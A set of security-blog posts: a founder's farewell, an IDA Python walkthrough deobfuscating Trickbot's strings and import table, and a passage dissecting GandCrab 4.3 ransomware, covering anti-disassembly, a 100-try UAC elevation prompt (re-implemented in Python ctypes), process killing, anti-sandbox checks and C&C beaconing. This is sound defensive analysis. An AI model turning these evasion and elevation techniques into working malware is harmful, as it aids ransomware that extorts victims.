A Chapter Closes

When we registered the domain cyber.wtf, G DATA Advanced Analytics (ADAN) was only Marion, Jan, and me. Our sole offering was malware analysis, and we were sharing an office that had been vacated by G DATA’s security labs and was scheduled for a thorough makeover later that year. That was almost exactly six years ago.

:~$ whois cyber.wtf
Domain Name: cyber.wtf
Creation Date: 2016-02-25T10:00:20Z
Registry Expiry Date: 2022-02-25T10:00:20Z

A few months before that, I had accepted the task of building a security service provider under the roof of an AV company. ADAN has grown quite a bit over the years in terms of people and portfolio, and G DATA has changed and grown as well. It’s been quite a ride, and I’d like to thank everyone who supported our cause and who lent me and my colleagues their ears, hearts, and brains over the years. At the end of February I’ll resign from my role as founding CEO of G DATA ADAN.

All the best,
Tilman

Using IDA Python to analyze Trickbot

Introduction

When analyzing malware, one often has to deal with lots of tricks and obfuscation techniques. In this post we will look at several obfuscation and anti-analysis techniques used by the malware Trickbot, based on the sample 8F590AC32A7C7C0DDFBFA7A70E33EC0EE6EB8D88846DEFBDA6144FADCC23663A from mid-December 2018.

After analyzing and understanding the obfuscation techniques, we will take care of deobfuscating the malware with IDA Python in order to make the code easier to analyze in Hex-Rays’ decompiler.

Related Work

With a malware as widespread and publicly known as Trickbot, there is already a lot of research. Some intersections with this article can be found in the work of Michał Praszmo at https://www.cert.pl/en/news/single/detricking-trickbot-loader/, where some of the obfuscation features are touched upon. A similar, but more in-depth analysis by Hasherezade can be found at https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/ in conjunction with the tutorial at https://www.youtube.com/watch?v=KMcSAlS9zGE. Vitali Kremez also explained the string obfuscation of a Trickbot sample at https://www.vkremez.com/2018/07/lets-learn-trickbot-new-tor-plugin.html

Obfuscated Import Address Table

If you load the unpacked binary into IDA, you can see that Trickbot has several imported functions:

[Figure 1]

Yet, the first line of the decompiled wWinMain() shows lots of function calls relative to the address stored at dword_42A648.

[Figure 2]

Looking at the x-refs of this address, we can find out in which context it is written to:

[Figure 3]

Decompiling the function sub_402D30() shows that dword_42A648 points to a buffer of 0x208 bytes (or 130 DWORDs). The buffer is modified in the same function with a call to sub_40C8C0().

[Figure 4]

Note that stru_42A058 holds a pointer to a structure which we will get to know in the following function, as it is an argument for the call to sub_40C8C0(). This call is made 8 times in a loop, as you can see in lines 21 to 27.
Within sub_40C8C0(), Hex-Rays’ decompiler shows the following picture:

[Figure 5]

We can see the following things:

  • The argument called “hModule” by IDA is a pointer to a structure. Its first DWORD contains a hint to a string used in LoadLibraryW() in lines 12 and 13.
  • The second DWORD of the structure is used in lines 14, 16, 18 and 21 and contains a list of hints to function names used in GetProcAddress().
  • The third DWORD of the structure is used to mark the end of the list of the second DWORD in the for-loop in line 16.
  • The fourth DWORD of the structure is used in lines 15, 16 and 20 and points to a list of offsets, which is used to calculate the addresses where the imported functions are stored, relative to the base of our previously allocated 0x208-byte buffer.

Putting it all together, our structure is defined as follows:

struct IATstruct
{
DWORD offsetForDecryptionDLLname;
DWORD offsetForDecryptionImportNamesArrayStart;
DWORD offsetForDecryptionImportNamesArrayEnd;
DWORD IAToffset;
};

Now our function looks much nicer:

[Figure 6]

It is now obvious that our mysterious buffer of 0x208 bytes is actually an IAT stored on the heap. The pointer to the IAT is located at dword_42A648, and the 383 x-refs to this address which we saw in the beginning are mostly calls through this IAT.

Decrypt All Strings

Now the question remains what the functions sub_407110() and sub_405210() do to yield library and function names. When disassembling them, you can see that both call sub_40E970(). Only the first one, sub_407110(), has an additional call after that, but it is only used to transform the string into a wide string.

So the actual magic happens in sub_40E970():

[Figure 9]

We see a single call to sub_404080(). But most important is the first function argument, which adds a1 to the base address of the label which IDA called “Src”. Looking at Src, we can see it is a table with offsets to some scrambled strings:

[Figure 10]

So the argument a1 is simply an offset into the table pointed to by Src and decides which of the strings is provided to sub_404080().

When looking at sub_404080(), we can see a function which has over 100 lines of disassembled code. I just chose the most relevant part to display in a screenshot:

[Figure 11]

Without going too much into detail, you can see that from lines 44 to 63 a substitution takes place, based on the first function argument (copied to “Dst”) and the string pointer named off_42A050 by IDA in line 44. The string looks like this:

[Figure 12]

From lines 64 to 69 the previously substituted bytes are then mangled by some bit operations, where four input bytes are mapped to three output bytes. According to the blog of Vitali Kremez mentioned above, this was once a base64 algorithm with a custom alphabet. It is still similar to that, but it seems to have been extended by the bit manipulation operations.

Putting it all together, we now know that each string of the IAT is scrambled by a substitution cipher and a bit manipulation algorithm. The arguments passed to sub_407110() and sub_405210() by the IAT-building algorithm described previously are offsets into the table of string pointers to the scrambled strings stored at 0x00427C1C, called “Src” by IDA.

We also know that sub_407110() returns a wide string, while sub_405210() returns an ANSI string.
When cross-referencing those two functions, we can see 159 and 52 calls to them:

[Figures 13 and 14]

Looking at the calls, we can see that the argument which describes the string offset is pushed on the stack as the second function argument, in our case 73h. The pointer to the output string is the first argument:

[Figure 15]

Looking a bit further, we can find a third function, sub_4019F0(), which calls sub_40E970() to decrypt strings. Again, the argument is provided via a push of a constant number.

So we can write a simple IDA Python script to decrypt all strings and print them (a sketch follows the list below). The algorithm is quite simple:

  1. Manually identify all three functions which call sub_40E970()
  2. For each xref to one of those three functions:
    1. Disassemble backwards until we find the first push which is a number
    2. Add the base address of the crypted string table to find the referenced string
    3. Decrypt the string based on the reversed algorithm
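
A minimal sketch of that script could look like this. decrypt_string() stands in for a reimplementation of the reversed substitution and bit-mangling algorithm, taking the address computed in step 2; the addresses and the old-style IDA 6.9 API calls match the rest of this post:

import idautils, idc

CRYPTED_TABLE = 0x00427C1C  # "Src", the table of offsets to the scrambled strings
DECRYPT_FUNCS = [0x407110, 0x405210, 0x4019F0]  # the three callers of sub_40E970()

def find_pushed_offset(call_ea):
    # step 2.1: disassemble backwards until we hit a push of an immediate
    ea = call_ea
    for _ in range(16):
        ea = idc.PrevHead(ea)
        if idc.GetMnem(ea) == "push" and idc.GetOpType(ea, 0) == idc.o_imm:
            return idc.GetOperandValue(ea, 0)
    return None

for func in DECRYPT_FUNCS:
    for call_ea in idautils.CodeRefsTo(func, 0):
        offset = find_pushed_offset(call_ea)
        if offset is not None:
            # steps 2.2 and 2.3: resolve the table entry and decrypt
            print hex(call_ea), decrypt_string(CRYPTED_TABLE + offset)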

The output looks like this (note that line breaks in the decrypted strings are not escaped, but actually break the lines):

[Figure 16]

We can also adapt our algorithm to print the import address table, since we know the structure used in sub_40C8C0() to build the IAT (again, a sketch follows the list):

  1. Take the pointer at stru_42A058
  2. Convert the values stored there into an array of the structure “IATstruct” (described previously) with eight array elements
  3. For each of those eight elements:
    1. Decrypt the first DWORD as DLL name
    2. Iterate from the second to the third DWORD and decrypt the entries to get all imported functions
    3. Take the fourth DWORD as an offset where the function is placed on our IAT on the heap
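
A hedged sketch of this dump, re-using decrypt_string() and CRYPTED_TABLE from above (the field semantics follow the IATstruct definition; the exact pointer arithmetic is my assumption):

import idc

structArray = idc.Dword(0x42A058)  # stru_42A058 points to the IATstruct array

iat = {}
for i in range(8):                   # eight array elements
    entry = structArray + i * 16     # sizeof(IATstruct) == 16
    dllName = decrypt_string(CRYPTED_TABLE + idc.Dword(entry))
    namePtr = idc.Dword(entry + 4)   # start of the import name hints
    nameEnd = idc.Dword(entry + 8)   # end of that list
    iatOffs = idc.Dword(entry + 12)  # list of offsets into the heap IAT
    funcs = []
    while namePtr < nameEnd:
        funcName = decrypt_string(CRYPTED_TABLE + idc.Dword(namePtr))
        funcs.append((idc.Dword(iatOffs), funcName))
        namePtr += 4
        iatOffs += 4
    iat[dllName] = funcs
print iat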

Printing the IAT as a dictionary looks like this:

[Figure 17]

Setting Comments in the Decompilation

One thing that always bugged me: while it is trivial to add comments to the disassembly in IDA, there is no obvious way to do the same in the decompiler view. Since I use the decompiler a lot, I wanted to add my decrypted strings as comments there.

After rather unsatisfying Google searches, I spent hours in IDA’s API documentation, read a bunch of existing IDA plugins to look for hints, and tried out a lot. It turns out my IDA 6.9 is very crash-prone when working with IDA Python, and the documentation is not always as helpful as one would like it to be.

But I finally succeeded with a lot of trial and error and a little bit of brute forcing:
First you need to translate the address in the disassembly to the corresponding line of the decompiled code. Then, using a ctree object, you can place a comment there. Unfortunately, the ctree object needs to have the correct “item preciser” (ITP). An ITP specifies whether a comment is placed, e.g., on the line of an “else”, a “do”, an opening curly brace, and so on.
If you set the incorrect ITP on your ctree object, your comment is “orphaned” and won’t be placed correctly.

I still do not understand how to know in advance which ITP to use, so I developed a little brute force algorithm:

  1. Delete all orphaned comments from current function
  2. For each possible ITP:
    1. Set comment with current ITP
    2. If no orphaned comment exists, break loop

This algorithm is rather stupid. But after spending too much time on this issue, I was finally happy to have something that works.
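
For reference, here is a condensed version of that brute force (IDA 6.9 Python; the ITP range below is an assumption that simply covers the item precisers defined by the API):

import idaapi

def set_decompiler_comment(ea, comment):
    cfunc = idaapi.decompile(ea)
    if cfunc is None:
        return
    # step 1: delete orphaned comments left over from earlier attempts
    if cfunc.has_orphan_cmts():
        cfunc.del_orphan_cmts()
    tl = idaapi.treeloc_t()
    tl.ea = ea
    # step 2: brute force the item preciser
    for itp in range(idaapi.ITP_SEMI, idaapi.ITP_COLON + 1):
        tl.itp = itp
        cfunc.set_user_cmt(tl, comment)
        cfunc.save_user_cmts()
        # re-decompile so the orphan state is recalculated
        cfunc = idaapi.decompile(ea)
        if not cfunc.has_orphan_cmts():
            break  # step 2.1: the comment stuck, we are done
        cfunc.del_orphan_cmts()
        cfunc.save_user_cmts()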

The result looks like this:

[Figure 18]

Setting Function Information

Being able to decrypt all strings and set them as comments in the decompiled code helps a lot when reversing the binary. What is still missing is a properly usable IAT. We already know that the IAT is constructed at runtime on the heap.

Function calls to the IAT look like this:

[Figure 19]

The first two lines of the decompilation look as follows in the disassembly:

[Figure 20]

You can see in the first line that dword_42A648 is copied to eax, and eight lines later the offset 0xBC is added, until a call to the register ecx executes the WinAPI call. The last five lines show a second WinAPI call in simpler fashion, with only one function argument.
The mov instructions in lines five to eight are irrelevant for the function call, but the compiler decided to put them between the three pushes for the function arguments of the first call anyway.

The idea of how to fix this is quite simple; yet the implementation turned out to be way more complex:
We write a lightweight taint tracker and track the usage of dword_42A648, which holds the pointer to the IAT, to find all WinAPI calls. For each call, our taint tracking provides us the offset within the IAT, so we know which WinAPI is called. In our previous example, we would start with eax, which gets a copy of dword_42A648. Then we track eax until it is copied to ecx with the offset 0xBC. Then we track ecx until we see a call to ecx. Thus we know that the IAT offset 0xBC is used at this specific call.

In order to tell IDA what kind of return value and parameters each IAT call has, we need to do some more magic. First, we need to import all function definitions we need. E.g. for “SetCurrentDirectoryW” we need to define a function like this: “typedef BOOL __stdcall SetCurrentDirectoryW(LPCWSTR lpPathName);”. We import those function definitions as local types in IDA.

In the second step, we create a local structure which reflects our IAT. So instead of only naming the pointer e.g. “CreateThread”, we also give it the type CreateThread, which we imported as a local type.

[Figure 21]

This IAT structure is then applied to the address dword_42A648, so we can see which function is called when dword_42A648 is referenced. The decompilation of e.g. sub_402B00 then looks like this:

[Figure 22]

We can see three calls to WinAPIs and their corresponding names in lines 18, 31 and 34. Yet neither the number of function arguments nor their types are identified properly. For example, in line 18 IDA shows five function arguments where there should be four, and in line 31 there is one where there should be three.

Additionally, the type PSECURITY_DESCRIPTOR is not set for the third argument in line 18; instead IDA set it to void*. And instead of LPSECURITY_ATTRIBUTES, IDA uses an int* in line 31.

In order to fix this, we can now leverage our taint tracking information and define each call with its corresponding function type by using the IDA Python functions apply_callee_tinfo() and set_op_tinfo2() of the idaapi module. This triggers IDA’s magic and propagates the added information to the disassembly, so that even stack variables are redefined and renamed.

[Figure 23]

We can now see that the function calls have the correct number of arguments as well as the correct argument types. The stack variables were also redefined and renamed correctly.

You always know you are going down a very dark trail when the IDA Python functions you are using have fewer than 10 hits on Google and most of those hits are just copies of the same text.
Yet, I found the existing IDA Python script “apply_callee_type.py” from Jay Smith on https://github.com/fireeye/flare-ida/blob/master/python/flare/apply_callee_type.py extremely helpful in understanding how to do such magic in IDA.

The final pseudo algorithm looks like this (a condensed sketch of the tracking loop follows the list):

  1. Iterate over the decrypted IAT and for each imported function:
    1. Look up function definition in IDAs database
    2. Import function definition to local types for later use
  2. Create IAT structure and import it as local type called “IAT”
  3. Set dword_42A648 as type “IAT”
  4. For each read-reference to dword_42A648:
    1. Get the register which holds dword_42A648
    2. Disassemble forward until the register is copied with an offset to a new register, remember the used offset
    3. Disassemble forward until the new register is called, remember this address
    4. Depending on the used offset, look up the function definition of the IAT function
    5. Apply function definition to current address
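
A stripped-down version of the tracking loop for step 4 might look like this; steps 4.4 and 4.5 would then look up and apply the type information as described above. It is simplified to the mov/call patterns seen in this sample and will miss more creative register juggling:

import idautils, idc

IAT_PTR = 0x42A648  # dword_42A648, holds the runtime pointer to the IAT

def track_iat_call(xref_ea):
    if idc.GetMnem(xref_ea) != "mov":
        return None
    reg = idc.GetOpnd(xref_ea, 0)  # step 4.1: e.g. "eax"
    ea, offset = xref_ea, None
    for _ in range(50):  # give up after a while
        ea = idc.NextHead(ea)
        mnem = idc.GetMnem(ea)
        # step 4.2: e.g. "mov ecx, [eax+0BCh]" copies with an offset
        if mnem == "mov" and ("[%s+" % reg) in idc.GetOpnd(ea, 1):
            offset = idc.GetOperandValue(ea, 1)  # the displacement, e.g. 0xBC
            reg = idc.GetOpnd(ea, 0)
        # step 4.3: "call ecx" is the WinAPI call we are after
        elif mnem == "call" and idc.GetOpnd(ea, 0) == reg:
            return ea, offset
    return None

for xref in idautils.DataRefsTo(IAT_PTR):
    hit = track_iat_call(xref)
    if hit is not None:
        print "call at %s uses IAT offset %s" % (hex(hit[0]), hex(hit[1]))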

Conclusion

In the first part we learned how Trickbot obfuscates its strings and how we can leverage static code analysis in order to deobfuscate the strings and put them into a usable format in IDA.

In the second part we analyzed how the dynamically created import address table of Trickbot can be restored and how IDA can be instructed to apply the data types of the imported functions to get a nice and clean decompilation result.

Finally, I would like to thank my colleagues from G DATA Advanced Analytics for proofreading this article.
Additionally, I would like to thank the Trickbot authors for the interesting and partially challenging malware.

You can find the IDA Python scripts at https://github.com/GDATAAdvancedAnalytics/IDA-Python

Dissecting GandCrab Version 4.3

Introduction

GandCrab is a ransomware that has been around for over a year and has steadily altered (I explicitly do not say “improved”) its code. The author(s) version their builds; the version analyzed in this blog post is GandCrab’s internal version 4.3 with the SHA-256 c9941b3fd655d04763721f266185454bef94461359642eec724d0cf3f198c988.

[Figure 1]

GandCrab has been around for a while, but it gained relevance for us when we received incoming requests for incident response engagements, primarily from medium-sized companies. On the 24th of August 2018, GandCrab started to push some e-mail-based campaigns against German-speaking countries, as already described by our esteemed colleague Hauke at https://www.gdata.de/blog/2018/09/31078-professionelle-ransomware-kampagne-greift-personalabteilungen-mit-bewerbungen-an (G DATA’s corporate blog is typically obfuscated in German).

In the meantime, Bitdefender released a tool to decrypt several variants of GandCrab, including the analyzed one: https://labs.bitdefender.com/2018/10/gandcrab-ransomware-decryption-tool-available-for-free/

To the best of our knowledge, the tool does not exploit any flaw in the encryption of GandCrab; instead it uses a copy of the master private key, which can be used to revert the whole encryption. Details on how the encryption is done by GandCrab can be found later in this article.


Motivation

We analyzed GandCrab on demand; when we initially started the analysis, we had about zero knowledge of GandCrab’s internal details. This article is meant as a walkthrough of the analysis process, with some focus on the execution flow of GandCrab as well as on the analysis of the kernel driver exploit contained in this sample. As we are documenting in retrospect, various blog posts on GandCrab already exist that document its features, tricks and oddities. You can find a very good feature comparison and timeline at https://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/. An additional timeline, a few details about the kernel driver exploit added in version 4.2.1, as well as an explanation of the latest features of each version can be found at https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html

Starting the analysis

Unpacking

The step of unpacking the sample will be skipped here, as it takes around 30 seconds if you have the correct setup and know what to expect in the unpacked form. At our first encounter with the sample, we didn’t know what to expect, so it took us a few minutes.

Removing the junk code

When loading the sample into IDA, you are first greeted by a scrambled main function, which trips IDA up a bit.

[Figure 2]

After rolling my eyes and being afraid I had not unpacked the sample properly, I looked at some random functions identified by IDA and noticed that most of the code looked readable, but that several functions had the same anti-disassembly trick.

Hoping to see a cool VM packer or some advanced obfuscation tricks, I started to analyze the junk code, which starts at the first call in line number 3.

Obviously, the two conditional short jumps two instructions later point to a location which was not properly disassembled by IDA. After fixing the disassembly of the jump target, the code looks like this:

[Figure 3]

So, reading the disassembly, we have a call which only pushes the return address onto the stack. This return address, being the topmost stack element, is then increased by 0x11. In the next step, depending on the state of the ZF bit (or simply “zero flag”), either the JNZ or the JZ condition triggers and jumps to the pop eax, jmp eax instructions, which pop the altered return address from the stack and jump to it. Disassembling the jump target two bytes after the jump itself yields the following result:

[Figure 4]

We can see that the jmp eax leads us to the call to address 0x40414B. Since ExitProcess is called afterwards, we can assume that 0x40414B is the main function of GandCrab. Disassembling this function in IDA looks like this:

[Figure 5]

Well, we’ve seen this byte sequence at the function prologue somewhere before…

In case you’re only reading the text and not really looking at the pictures, you might have missed that the function prologue not only looks the same for both functions we have seen so far; it is the very same byte sequence.

Also, IDA did not notice that a new function starts at address 0x40414B, which is why it placed the “loc_40414B” label there.

After succeeding in decompiling the function by simply NOPing out the junk instructions by hand, I wrote a short IDA Python script to patch all locations where the junk instructions were:

import idaapi

# byte pattern of the junk code block
tmp = "E8 00 00 00 00 3E 83 04 24 11 75 05 74 03 E9 28 14 58 FF E0 00 E9"
# 22 NOP bytes to overwrite the 22 junk bytes
patchbytes = "\x90" * 22

while True:
  # searching from 0 each time works because patching destroys the pattern at the hit
  cur = FindBinary(0, SEARCH_DOWN, tmp)
  if cur == idaapi.BADADDR:
    break
  print hex(cur)
  idaapi.patch_many_bytes(cur, patchbytes)

The Python script prints each location where it patched something, so I could then check if IDA detected this location as the start of a function and test if I could decompile it. Of course, defining a function could also be done by a script, but for 29 functions, this was still doable by hand, and the IDA API is also not the most intuitive API to use when you’re in a bit of a hurry.
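
If you wanted to script that step anyway, something along these lines should do it, placed right after the patch_many_bytes() call in the loop above (untested sketch; it relies on the observation that the junk sequence sits right at the function prologue, so the patched address is also the function start):

  MakeCode(cur)
  MakeFunction(cur)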

So yep, patching was rather trivial, as Fortinet confirmed: https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html

Following the execution flow

After a few small hurdles described before, we can start looking at GandCrab and analyze the execution flow step by step.

Before doing so, here is a reference of what we’re going to see and which function calls which one. Since there will be a lot of function calls and returns, it is easy to get lost, so take this as a reference (maybe put it on a second screen, print it, open it in a second tab, …) while you’re reading the rest of this article:

main
----Elevate Privileges
----closeRunningProcesses
----mainFunction
--------bIsSystemLocaleNotOk
--------bCheckMutex
--------decryptPubKey
--------0x00401C56
--------0x00405B7D
--------encRC4
--------internetThread
------------0x004047BD
------------contactCnC
--------startEncryption
------------decryptFileEndings
------------createRSAkeypair
------------saveKeysToRegOrGetExisting
----------------getKeypairFromRegistry
----------------encrypPubKey
--------------------getRandomBytes
--------------------importRSAkeyAndEncryptBuffer
----------------writeRegistryKeys
------------createUserfileOutput
------------concatUserInfoToRansomNote
------------startEncryptionsInThreads
----------------encryptNetworkThread
--------------------enumNetworksAndEncrypt
------------------------loopFoldersAndEncrypt_wrapper
----------------------------loopFoldersAndEncrypt
--------------------------------...
----------------prepareEncryption
----------------encryptLocalDriveThread
--------------------loopFoldersAndEncrypt
------------------------0x0040512C
------------------------0x004053FD
------------------------0x00405525
------------------------encryptFile
----------------------------bIsFileEndingInBlacklist
----------------------------bIsFilenameOnBlacklist
----------------------------encryptionFunc
--------------------------------...
--------deleteShadowCopies
----AntiStealth
----deleteSelfWithTimeout

We’re beginning at what I call the main function at 0x0040414B. It starts very simply:

[Figure 6]

The first function call to a function named “nullsub_1” by IDA is, as the name already implies, nothing interesting:

[Figure 7]

Those kinds of functions are often generated by compilers if you remove the content of a function via preprocessor directives like “#ifdef DEBUG”. I suppose the author(s) of GandCrab placed either some debug string or a breakpoint there when compiling the debug version. And since we are looking at the release compilation, the function is empty.

Elevating privileges

The next part of the main function is a simple check whether the sample is running on Windows Vista or newer. If so, GandCrab checks whether the current process is running with integrity level low or even lower. If that is the case, a very cheap but simple trick is used to gain normal user privileges:

[Figure 8]

By calling the WinAPI ShellExecuteW with “%windir%\system32\wbem\wmic” as the “lpFile” parameter, “runas” as the “lpVerb” parameter and “process call create \”cmd /c start %s\”” as “lpParameters”, GandCrab starts a process that asks the user to execute a command line with normal user privileges, which in turn starts GandCrab from the command line. After the new process is started, the initial process ends itself by calling ExitProcess(0).

As you can see in the first lines of the screenshot, GandCrab obfuscates the strings by filling the wchar array during runtime with mov instructions. This is also a well-known trick for string obfuscation.

Given the distribution methods of GandCrab, which include exploit kits, this kind of functionality makes sense: Most exploit kits nowadays only deliver exploits to gain code execution via bugs in browsers or browser plugins. And all major browsers try to sandbox their worker processes in low or even zero privileged process containers. So a successful exploit against a modern browser will initially run with low or zero integrity level, unless a second exploit is fired to elevate the process’s privileges.

GandCrab goes the easy way: instead of firing a privilege escalation exploit, it simply asks the user for more privileges, but does so in a very sneaky way. Those user level (aka medium integrity) rights are needed to later encrypt the user’s files.

[Figure 9]

In the above screenshot you can see what happens if you run GandCrab on a German Windows 8 with low integrity: The UAC dialogue pops up.

You might have noticed that the whole privilege escalation is wrapped in a loop with 100 tries, which makes it very dangerous for average users: you either have to click “No” 100 times, or GandCrab gets executed with medium integrity.
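
The logic boils down to something like the following Python/ctypes rendering (the show command SW_SHOWNORMAL and the success check on ShellExecuteW’s HINSTANCE return value are my assumptions; sys.argv[0] merely stands in for the path of the running executable):

import ctypes, os, sys

def nag_until_elevated():
    wmic = os.path.expandvars(u"%windir%\\system32\\wbem\\wmic")
    params = u'process call create "cmd /c start %s"' % sys.argv[0]
    for _ in range(100):  # GandCrab retries up to 100 times
        ret = ctypes.windll.shell32.ShellExecuteW(
            None, u"runas", wmic, params, None, 1)
        if ret > 32:  # ShellExecute returns values > 32 on success
            ctypes.windll.kernel32.ExitProcess(0)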

Ensuring File Access

So GandCrab either already has enough privileges, or it tries to start a new process with enough privileges with the user’s help. In any case the execution flow then goes back to the main function, where the next call to 0x00403F7D, a function which I named “closeRunningProcesses()”, takes place.

[Figure 10]

First, GandCrab fills an array, called lpString1 by IDA in the screenshot, with string pointers. Then, by using the CreateToolhelp32Snapshot API with the TH32CS_SNAPPROCESS flag, it iterates over all running processes and checks each process name against the list in the lpString1 array. Each matching process is opened and terminated, provided GandCrab obtains the corresponding process handle.

The full list of process names is:

msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exeisqlplussvc.exe, xfssvccon.exe, sqlservr.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exeagntsvc.exe, agntsvc.exeencsvc.exe, firefoxconfig.exe, tbirdconfig.exe, mydesktopqos.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, sqlservr.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe

Using my favorite open source intelligence tool, called Google, and searching for some of those process names, you can find a list from a Cerber sample which around two years ago did the very same thing. https://www.bleepingcomputer.com/news/security/cerber-ransomware-switches-to-a-random-extension-and-ends-database-processes/

The only difference is that Cerber’s list has fewer entries. Yet GandCrab seems to have copied the exact list; even the order of items is nearly the same. GandCrab only added some entries at the end of the list.

The reason for this feature is as follows:
Those processes might have open handles on important files, which would prevent GandCrab from getting a writable handle on those files when trying to encrypt them. So it kills those processes to ensure it can access files which might otherwise be blocked.

The MainFunction

Once GandCrab has ensured that a bunch of processes have been killed, the execution flow goes from the main function to a function which I called mainFunction at 0x0040398C. It might not have been my brightest idea to name the first function “main” (0x0040414B) and one of the following sub-functions “mainFunction” (0x0040398C), but let‘s stick with it for now.

Most of the GandCrab functionality takes place in this function: anti-debugging/emulator/sandbox tricks, gathering and sending telemetry to the C&C, threading, encryption, as well as taunting IT security companies.

As this function is a bit bigger, I cut the screenshots into parts to explain the single steps.

GandCrab does not like Emulators and Sandboxes

We start with a simple anti-emulator/sandbox trick: By calling OpenProcess() with invalid arguments and subsequently checking the error code, GandCrab ensures that no one is fiddling with the OpenProcess API. Some simple emulators or sandboxes might always return “success” and will thus not set the expected error code, which is probably what this part is trying to detect.

[Figure 11]

GandCrab is afraid of Russians and Cyrillic keyboards

In bIsSystemLocaleNotOk() at 0x00403528, GandCrab checks whether a Russian keyboard layout is installed or whether the system’s default UI language is on its internal blacklist. In both cases GandCrab stops its execution and deletes itself from the system by calling deleteSelfWithTimeout() at 0x004032CE.

[Figure 12]

[Figure 13]

There can be only one GandCrab

The next check, in bCheckMutex() at 0x00403092, tries to prevent several instances of GandCrab from running at the same time. By creating a named mutex via CreateMutexW() and subsequently checking for the error codes ERROR_ACCESS_DENIED and ERROR_ALREADY_EXISTS, it ensures that the mutex is created, and the function fails if the mutex already exists.

[Figure 14]

With the mutex name, GandCrab starts its first taunt against Ahnlab. According to https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html, the text in the picture behind the link in the string buffer translates to “I added you to my gay list. I used a pencil for the time being”. Since I don’t speak Russian, you have to take Fortinet’s word for the translation.

Shipping its own public key

With the next call, to decryptPubKey() at 0x004038DA, a public key stored in the .data section is decrypted. The decrypted key is put into heap memory, and the pointer to that memory is stored in a global variable for later use.

[Figure 15]

The public key is first XORed with 5 and afterwards decrypted with the Salsa20 stream cipher. The decryption key for the stream cipher is a greeting to the inventor of the Salsa20 algorithm, Daniel Bernstein, who is also addressed by his Twitter handle @hashbreaker.
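
The first layer is trivial to reproduce; the same single-byte XOR loop reappears later with other keys (e.g. 0x10 for the ransom note), so a tiny helper covers all of them:

def xor_layer(buf, key=5):
    # GandCrab's recurring single-byte XOR obfuscation
    return "".join(chr(ord(c) ^ key) for c in buf)

The Salsa20 layer on top of it is a standard implementation, so it is not repeated here.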

Im in ur machine, stealing ur infoz

In the next two subsequent calls to 0x00401C56 and 0x00405B7D (not shown in any screenshot), GandCrab initializes an internal structure and then fills it with information about the current system.

Most of the data in this structure is organized in groups of three. The first element is a boolean value, set during initialization of the structure, which controls whether the next two elements are used. Those next two elements are a static name set during initialization and a value calculated at runtime (think of it like a key/value pair in JSON).
E.g.:

DWORD bShouldFillDomainName; //set to 0/1 during initialization
DWORD pc_group; //static name
DWORD domainName; //calculated during runtime

By using this format, GandCrab can read the following information from the target computer, if configured to do so:

  • User Name
  • Computer Name
  • Domain Name
  • Installed AV Product
  • Keyboard Locale
  • Windows Product Name
  • Processor Architecture
  • Volume Serial Number
  • CPU Name (as defined in HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0)
  • Type of each attached drive (as defined by GetDriveTypeW())
  • Free disk space of each attached drive

Additionally, a “ransom_id” is calculated by computing ntdll.RtlComputeCrc32() over the CPU name with the initial CRC 666 as seed, transforming the resulting DWORD into a string, and then concatenating the serial number of the volume on which Windows is installed.
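
Rebuilt in Python, the computation might look like this (RtlComputeCrc32() is an undocumented ntdll export with the signature RtlComputeCrc32(initial, buffer, length); the exact string formatting of the two values is my assumption):

import ctypes

def ransom_id(cpu_name, win_volume_serial):
    # CRC32 over the CPU name, seeded with 666
    crc = ctypes.windll.ntdll.RtlComputeCrc32(666, cpu_name, len(cpu_name))
    # ...concatenated with the serial number of the Windows volume
    return "%x%x" % (crc & 0xFFFFFFFF, win_volume_serial)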

The whole structure of stolen information is then serialized into a string of the form “key1=value1&key2=value2[…]”, and then two IDs as well as the version information are added.

Afterwards the whole string is encrypted with RC4 and the static key “jopochlen” in the function at 0x00404B66, which I called encRC4().

[Figure 16]

In between those string concatenation functions, you can see another mockery of Ahnlab: GandCrab claims to have a possible write-what-where kernel exploit with a privelege [sic] escalation for their security suite Ahnlab V3 Lite. You can read about the analysis of this exploit later in this article.

GandCrab home phone

Once the information about the infected system has been gathered, a thread is started which pushes this information to the C&C server. It starts at 0x004048D7, a function I called internetThread().

This part is rather weird, but very effective against network-based IDS/IPS as well as against sinkholing attacks on GandCrab’s C&Cs.

[Figure 17]

It starts with GandCrab decrypting a huge char array with the previously seen XOR algorithm.

As this blob is huge, I’m not showing it here. It contains 960 different domains and IPs, separated by semicolons. For each of those domains/IPs the function at 0x004047BD is called. In this function, several randomized strings are generated, which form a random path for the C&C URI.

[Figure 18]

The first random string is one of those seven. The seed of the randomness is based on GetTickCount().

[Figure 19]

The second random string is chosen from one of the eight strings shown above.

[Figure 20]

The third string is built in a slightly more complex way: From a pool of 16 two-char strings, one is chosen randomly. Then, depending on further random numbers, a random string from the same pool is concatenated between zero and five more times. The result is later used as the file name in the URL’s path.

[Figure 21]

The fourth and last random string is one of the four file name extensions shown above (since the char* array from the first random string is re-used for the fourth random string, the offset starts at 3 instead of 0, which looks odd in the screenshot).

Then, with the call to wsprintfW(), the URL is built and the function contactCnC() at 0x00404682 is called, which ultimately sends the gathered system information to the C&C server.

There is not much of interest to show in contactCnC(). The already serialized and RC4-encrypted system information is accessed via a global variable (which is why you can’t see it as an argument in the above screenshot) and is base64 encoded before being transmitted.

Before sending the information to the C&C server as multipart/form-data in a POST request, GandCrab first contacts the domain with a GET request and decides, based on the HTTP status code (30x), whether the server should be contacted via HTTP or HTTPS.

What GandCrab does is actually easy to describe, but it poses a few problems for defenders and analysts. Most of the domains/IPs contacted by GandCrab are benign websites of real companies or organizations. So I assume that GandCrab either sneaked at least one of its own C&C domains/IPs into the list, or compromised one of those legitimate websites to receive C&C traffic. We haven’t followed up on that aspect so far.

